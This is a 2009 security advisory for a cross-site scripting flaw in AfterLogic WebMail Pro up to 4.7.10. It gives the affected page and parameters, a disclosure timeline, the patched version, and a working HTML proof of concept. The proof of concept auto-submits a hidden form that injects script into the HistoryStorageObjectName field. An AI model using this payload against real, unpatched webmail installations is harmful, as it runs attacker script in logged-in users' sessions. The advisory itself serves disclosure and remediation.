55 lines
No EOL
1.7 KiB
Text
55 lines
No EOL
1.7 KiB
Text
Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro
|
|
|
|
Description
|
|
-------------
|
|
AfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection
|
|
of malicious code in the context of the application.
|
|
|
|
Overview
|
|
-----------
|
|
Quote from http://www.afterlogic.com/products/webmail-pro :
|
|
"Webmail front-end for your existing POP3/IMAP mail server. Offer your users
|
|
the fast AJAX webmail and innovative calendar with sharing. Stay in control
|
|
with the admin panel and the developer's API."
|
|
|
|
Details
|
|
--------
|
|
Vulnerable Product : AfterLogic WebMail Pro <= 4.7.10
|
|
Vulnerability Type : Cross-Site Scripting (XSS)
|
|
Affected page : history-storage.aspx
|
|
Vulnerable parameters : HistoryKey, HistoryStorageObjectName
|
|
Discovered by :
|
|
Sébastien Duquette (http://intheknow-security.blogspot.com)
|
|
Gardien Virtuel (www.gardienvirtuel.com)
|
|
Original Advisory :
|
|
http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt
|
|
|
|
Timeline
|
|
----------
|
|
Bug Discovered : September 18th, 2009
|
|
Vendor Advised : September 23rd, 2009
|
|
Fix made available : September 30th, 2009
|
|
|
|
Proof of concept
|
|
-------------------
|
|
The targeted user must be logged in the webmail. This proof of concept was
|
|
successfully tested in Firefox 3.5 and Internet Explorer 8.
|
|
|
|
<html>
|
|
<head>
|
|
</head>
|
|
<body onLoad="document.form1.submit()">
|
|
<form name="form1" method="post"
|
|
action="http://WEBSITE/history-storage.aspx?param=0.21188772204998574";
|
|
onSubmit="return false;">
|
|
<input type="hidden" name="HistoryKey" value="value"/>
|
|
<input type="hidden" name="HistoryStorageObjectName" value="location;
|
|
alert('xss'); //"/>
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
Solution
|
|
---------
|
|
The vendor has made available a patched version. Update to AfterLogic
|
|
Webmail Pro 4.7.11 |